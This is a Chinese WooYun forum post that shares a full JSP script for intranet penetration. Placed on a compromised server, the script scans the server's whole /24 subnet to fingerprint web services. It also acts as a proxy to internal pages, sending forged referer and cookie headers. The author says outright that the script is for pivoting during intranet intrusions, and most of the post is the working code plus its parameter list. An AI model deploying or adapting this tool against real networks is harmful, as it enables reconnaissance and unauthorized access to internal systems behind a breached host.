- A+
所属分类:WooYun-Zone
jeary ((:?办么怎,了多越来越法方象抽的我)) 
| 2015-09-09 19:06
jsp内网探测脚本&简单代理访问 (WOOYUN)
直接上图:
..
1.直接访问默认扫描当前IP的C段,获取标题、web容器.
2.可以自定义传入需要扫描的段,传入参数ip即可
3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ page isThreadSafe="false"%>
<%@page import="java.io.PrintWriter"%>
<%@page import="java.io.OutputStreamWriter"%>
<%@page import="java.util.regex.Matcher"%>
<%@page import="java.io.IOException"%>
<%@page import="java.net.InetAddress"%>
<%@page import="java.util.regex.Pattern"%>
<%@page import="java.net.HttpURLConnection"%>
<%@page import="java.util.concurrent.LinkedBlockingQueue"%>
<%!final static List<String> list = new ArrayList<String>();
String referer = "";
String cookie = "";
String decode = "utf-8";
int thread = 100;
HttpURLConnection getHTTPConn(String urlString) {
try {
java.net.URL url = new java.net.URL(urlString);
java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url
.openConnection();
conn.setRequestMethod("GET");
conn.addRequestProperty("User-Agent",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
conn.addRequestProperty("Accept-Encoding", "gzip");
conn.addRequestProperty("referer", referer);
conn.addRequestProperty("cookie", cookie);
//conn.setInstanceFollowRedirects(false);
conn.setConnectTimeout(3000);
conn.setReadTimeout(3000);
return conn;
} catch (Exception e) {
return null;
}
}
HttpURLConnection conn;
String getHtmlContext(HttpURLConnection conn, String decode) {
Map<String, Object> result = new HashMap<String, Object>();
try {
String code = "utf-8";
if (decode != null) {
code = decode;
}
StringBuffer html = new StringBuffer();
java.io.InputStreamReader isr = new java.io.InputStreamReader(
conn.getInputStream(), code);
java.io.BufferedReader br = new java.io.BufferedReader(isr);
String temp;
while ((temp = br.readLine()) != null) {
if (!temp.trim().equals("")) {
html.append(temp).append("\n");
}
}
br.close();
isr.close();
return html.toString();
} catch (Exception e) {
System.out.println("getHtmlContext:"+e.getMessage());
return "null";
}
}
String getServerType(HttpURLConnection conn) {
try {
return conn.getHeaderField("Server");
} catch (Exception e) {
return "null";
}
}
String getTitle(String htmlSource) {
try {
List<String> list = new ArrayList<String>();
String title = "";
Pattern pa = Pattern.compile("<title>.*?</title>");
Matcher ma = pa.matcher(htmlSource);
while (ma.find()) {
list.add(ma.group());
}
for (int i = 0; i < list.size(); i++) {
title = title + list.get(i);
}
return title.replaceAll("<.*?>", "");
} catch (Exception e) {
return null;
}
}
List<String> getCss(String html, String url, String decode) {
List<String> cssurl = new ArrayList<String>();
List<String> csscode = new ArrayList<String>();
try {
String title = "";
Pattern pa = Pattern.compile(".*href=\"(.*)[.]css");
Matcher ma = pa.matcher(html.toLowerCase());
while (ma.find()) {
cssurl.add(ma.group(1) + ".css");
}
for (int i = 0; i < cssurl.size(); i++) {
String cssuuu = url + "/" + cssurl.get(i);
String csshtml = "<style>"
+ getHtmlContext(getHTTPConn(cssuuu), decode)
+ "</style>";
csscode.add(csshtml);
}
} catch (Exception e) {
System.out.println("getCss:"+e.getMessage());
}
return csscode;
}
String getMyIPLocal() throws IOException {
InetAddress ia = InetAddress.getLocalHost();
return ia.getHostAddress();
}%>
<%
String u = request.getParameter("url");
String ip = request.getParameter("ip");
if (u != null) {
decode = request.getParameter("decode");
String ref = request.getParameter("referer");
String cook = request.getParameter("cookie");
if (ref != null) {
referer = ref;
}
if (cook != null) {
cookie = cook;
}
String html = getHtmlContext(getHTTPConn(u), decode);
List<String> css = getCss(html, u, decode);
String csshtml = "";
if (!html.equals("null")) {
for (int i = 0; i < css.size(); i++) {
csshtml += css.get(i);
}
out.print(html + csshtml);
} else {
response.setStatus(HttpServletResponse.SC_NOT_FOUND);
out.print("请求失败!");
}
return;
}
else if (ip != null || u == null) {
String threadpp = (request.getParameter("thread"));
if (threadpp != null) {
thread = Integer.parseInt(threadpp);
System.out.println(threadpp);
}
try {
try {
String http = "http://";
String localIP = getMyIPLocal();
if (ip != null) {
localIP = ip;
}
String useIP = localIP.substring(0,
localIP.lastIndexOf(".") + 1);
final Queue<String> queue = new LinkedBlockingQueue<String>();
for (int i = 1; i <= 256; i++) {
String url = http + useIP + i;
queue.offer(url);
}
final JspWriter pw = out;
ThreadGroup tg = new ThreadGroup("c");
for (int i = 0; i < thread; i++) {
new Thread(tg, new Runnable() {
public void run() {
while (true) {
String addr = queue.poll();
if (addr != null) {
System.out.println(addr);
HttpURLConnection conn = getHTTPConn(addr);
String html = getHtmlContext(conn,
decode);
String title = getTitle(html);
String serverType = getServerType(conn);
String status = !html
.equals("null") ? "Success"
: "Fail";
if (html != null
&& !status.equals("Fail")) {
try {
pw.println(addr + " >> "+ title + ">>"+ serverType+ " >>" + status+ "<br/>");
} catch (Exception e) {
e.printStackTrace();
}
}
} else {
return;
}
}
}
}).start();
}
while (tg.activeCount() != 0) {
}
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception e) {
out.println(e.toString());
}
}
%>参数:
ip [需要探测的ip段]
url [需要请求的地址]
其他参数:
thread [指定线程数]
decode [指定编码]
referer [伪造referer]
cookie [伪造cookie]
待完善:
1.一个C段,可能有多种编码格式,所以指定一个参数是有问题的。
2.端口可以修改传入一个数组,支持探测多个端口80,8080..
3.代理访问功能并不完善,例如加载js、加载图片、超链接替换成代理访问的链接、表单替换支持真实请求..
对了,其实这个主要是用于偷懒或者内网渗透时,各种代理总是遇到问题出不来。坐等大神写个完善版本的。
(我自己来还得慢慢改。)
PS:很久没写代码,代码渣,多线程还是没学会。看来代码就是得天天写才能熟练。
(呵呵) 
